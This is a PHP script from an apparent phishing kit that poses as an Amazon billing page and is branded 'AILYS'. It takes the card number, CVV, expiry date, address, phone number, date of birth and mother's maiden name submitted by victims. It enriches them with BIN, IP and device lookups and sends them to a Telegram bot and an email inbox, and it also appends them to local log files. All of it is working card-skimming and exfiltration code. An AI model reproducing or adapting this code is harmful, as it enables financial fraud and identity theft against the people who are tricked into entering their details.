<?php
session_start();
$_SESSION['billing_submitted'] = true;

date_default_timezone_set('Asia/Jakarta');
include '../config.php';

function sendTelegram($message) {
    global $telegram_api_token, $telegram_chat_id;
    $url = "https://api.telegram.org/bot$telegram_api_token/sendMessage";
    $data = [
        'chat_id' => $telegram_chat_id,
        'text' => $message,
        'parse_mode' => 'HTML'
    ];
    $options = [
        'http' => [
            'method'  => 'POST',
            'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
            'content' => http_build_query($data),
        ],
    ];
    $context  = stream_context_create($options);
    file_get_contents($url, false, $context);
}

function sendEmail($message, $subject, $cardname) {
    global $emailresult;

    $headers = "From: AILYS CARD <agent007@vip.com>\r\n";
    $headers .= "Content-Type: text/html; charset=UTF-8\r\n";

    mail($emailresult, $subject, $message, $headers);
}


function logBilling($cardNumber, $expirationDate, $yearDate, $cvv, $fullname, $address, $city, $state, $zipcode, $phonenumber, $cty, $dob, $ip, $userAgent) {
    $logFile = '../logs/logs_card.txt';
    $date_time = date('Y-m-d H:i:s');
    $logMessage = "[$date_time] $cardNumber|$expirationDate/$yearDate|$cvv|$fullname|$address|$city|$state|$zipcode|$cty|$phonenumber|$dob|$ip|$userAgent\n";

    file_put_contents($logFile, $logMessage, FILE_APPEND);
}

function logBIN($formattedBin, $cardname, $scheme, $type, $cardTier, $issuer) {
    $logFile = '../logs/logs_bin.txt';
    $logMessage = "$formattedBin|$cardname|$scheme - $type $cardTier - $issuer\n";

    file_put_contents($logFile, $logMessage, FILE_APPEND);
}

function getRandomPhrase() {
    $file = 'kata2.txt';
    if (file_exists($file)) {
        $lines = file($file, FILE_IGNORE_NEW_LINES);
        $randomLine = $lines[array_rand($lines)];
        return $randomLine;
    }
    return "No phrase available";
}

function generate_random_string($length) {
    $length = max(1, min($length, 50));
    $characters = '0123456789abcdefghijklmnopqrstuvwxyz';
    $random_string = '';
    for ($i = 0; $i < $length; $i++) {
        $random_string .= $characters[rand(0, strlen($characters) - 1)];
    }
    return $random_string;
}

function getISPInfo($ip) {
    $url = "http://ip-api.com/json/{$ip}";
    $data = json_decode(file_get_contents($url), true);
    
    return [
        'ip' => $data['query'] ?? 'Unknown',
        'city' => $data['city'] ?? 'Unknown',
        'region' => $data['regionName'] ?? 'Unknown',
        'country' => $data['country'] ?? 'Unknown',
        'isp' => $data['isp'] ?? 'Unknown'
    ];
}

function getDeviceAndBrowser() {
    $userAgent = $_SERVER['HTTP_USER_AGENT'];
    $device = "Unknown Device";
    $browser = "Unknown Browser";

    if (strpos($userAgent, 'iPhone') !== false) {
        $device = "iPhone";
    } elseif (strpos($userAgent, 'iPad') !== false) {
        $device = "iPad";
    } elseif (strpos($userAgent, 'Android') !== false) {
        $device = "Android";
    } elseif (strpos($userAgent, 'Windows NT') !== false) {
        $device = "Windows";
    } elseif (strpos($userAgent, 'Macintosh') !== false) {
        $device = "Mac";
    }

    if (strpos($userAgent, 'Chrome') !== false) {
        $browser = "Chrome";
    } elseif (strpos($userAgent, 'Safari') !== false) {
        $browser = "Safari";
    } elseif (strpos($userAgent, 'Opera') !== false) {
        $browser = "Opera";
    } elseif (strpos($userAgent, 'Firefox') !== false) {
        $browser = "Firefox";
    } elseif (strpos($userAgent, 'Edge') !== false) {
        $browser = "Edge";
    }

    return [
        'device' => $device,
        'browser' => $browser,
        'user_agent' => $userAgent
    ];
}

function getCardDetailsFromBIN($bin) {
    $url = "https://data.handyapi.com/bin/$bin";
    
    $response = @file_get_contents($url);

    if ($response === false) {
        error_log("API request failed for BIN $bin");
        return [
            'issuer' => 'Unknown Issuer',
            'card_tier' => 'Unknown Tier',
            'scheme' => 'Unknown Scheme',
            'type' => 'Unknown Type'
        ];
    }

    $data = json_decode($response, true);

    if ($data === null || $data['Status'] !== 'SUCCESS') {
        error_log("Failed to decode JSON response for BIN $bin or invalid data");
        return [
            'issuer' => 'Unknown Issuer',
            'card_tier' => 'Unknown Tier',
            'scheme' => 'Unknown Scheme',
            'type' => 'Unknown Type'
        ];
    }

    $scheme = strtoupper($data['Scheme'] ?? 'Unknown Scheme');
    $type = strtoupper($data['Type'] ?? 'Unknown Type');
    $cardTier = strtoupper($data['CardTier'] ?? 'Unknown Tier');
    $issuer = $data['Issuer'] ?? 'Unknown Issuer';

    return [
        'issuer' => $issuer,
        'card_tier' => $cardTier,
        'scheme' => $scheme,
        'type' => $type
    ];
}


$random_string_10 = generate_random_string(10);
$random_string_15 = generate_random_string(15);


if ($_SERVER["REQUEST_METHOD"] == "POST") {
    $cardname = $_POST['cardname'];
    $cardNumber = str_replace(' ', '', $_POST['cardnumber']);
    $expirationDate = $_POST['expMonth'];
    $yearDate = $_POST['expYear'];
    $cvv = $_POST['cvv'];

    $bin = substr($cardNumber, 0, 6);

    $formattedCardNumber = implode(' ', str_split($cardNumber, 4));

    $formattedBin = $bin;

    $cardDetails = getCardDetailsFromBIN($bin);
    $issuer = strtoupper($cardDetails['issuer']);
    $cardTier = strtoupper($cardDetails['card_tier']);
    $scheme = strtoupper($cardDetails['scheme']);
    $type = strtoupper($cardDetails['type']);

    $fullname = $_POST['cardname'];
    $address = $_POST['address'];
    $city = $_POST['city'];
    $state = $_POST['state'];
    $zipcode = $_POST['zipcode'];
    $phonenumber = $_POST['phonenumber'];
    $cty = $_POST['cty'];
    $dob = $_POST['dob'];
    $mader = $_POST['mader'];

    $ip = $_SERVER['REMOTE_ADDR'];
    
    $ispInfo = getISPInfo($ip);
    $cityGeo = $ispInfo['city'];
    $region = $ispInfo['region'];
    $country = $ispInfo['country'];
    $isp = $ispInfo['isp'];
    
    $deviceBrowser = getDeviceAndBrowser();
    $device = $deviceBrowser['device'];
    $browser = $deviceBrowser['browser'];
    $userAgent = $deviceBrowser['user_agent'];
    
    $dateTime = date("Y-m-d H:i:s");
    
    $randomPhrase = getRandomPhrase();
    
$message = "<b>:: AILYS AMAZON - CARD INFO ::</b>\n\n";
$message .= "[#] Quote :: <i>$randomPhrase</i>\n\n";

$message .= ":: CARD INFORMATION ::\n";
$message .= "[#] Cardholder Name : <code>$cardname</code>\n";
$message .= "[#] Card Number : <code>$formattedCardNumber</code>\n";
$message .= "[#] Expiration Date : <code>$expirationDate/$yearDate</code>\n";  
$message .= "[#] CVV : <code>$cvv</code>\n";
$message .= "[#] Copy Format : <code>$cardNumber|$expirationDate/$yearDate|$cvv</code>\n";

$message .= "\n:: BILLING INFORMATION ::\n";
$message .= "[#] BIN : <code>$formattedBin</code>\n";
$message .= "[#] Bank Name : $issuer\n";  
$message .= "[#] Card Tier : $cardTier\n";  
$message .= "[#] Card Type : $scheme $type\n";  

$message .= "\n:: BILLING INFORMATION ::\n";
$message .= "[#] Address  : <code>$address</code>\n";
$message .= "[#] City : <code>$city</code>\n";
$message .= "[#] State : $state\n";
$message .= "[#] Zip Code : <code>$zipcode</code>\n";
$message .= "[#] Phone Number : <code>$phonenumber</code>\n";
$message .= "[#] Country : $cty\n";
$message .= "[#] DOB (MM/DD/YYYY) : <code>$dob</code>\n";

$message .= "\n:: VICTIM INFORMATION ::\n";
$message .= "[#] Date & Time : $dateTime\n";
$message .= "[#] IP : <code>$ip</code>\n";
$message .= "[#] ISP : $isp\n";
$message .= "[#] Device : $device\n";
$message .= "[#] Browser : $browser\n";
$message .= "[#] City : $cityGeo\n";
$message .= "[#] Region : $region\n";
$message .= "[#] Country : $country\n";
$message .= "[#] User Agent : <code>$userAgent</code>\n\n";
$message .= ":: AILYS X AMAZON ::";

$subject = ":: $cardname :: $formattedBin - $scheme - $type - $cardTier - $issuer [ $country - $device - $ip ]";

sendTelegram($message);

sendEmail($message, $subject, $cardname);

    $random_string_10 = generate_random_string(10);
    $random_string_15 = generate_random_string(15);
    $random_string_30 = generate_random_string(30);

    logBilling($cardNumber, $expirationDate, $yearDate, $cvv, $fullname, $address, $city, $state, $zipcode, $phonenumber, $cty, $dob, $ip, $userAgent);

    logBIN($formattedBin, $cardname, $scheme, $type, $cardTier, $issuer);

header("Location: ../controller.php?step=after_payment_step");
exit();
}
?>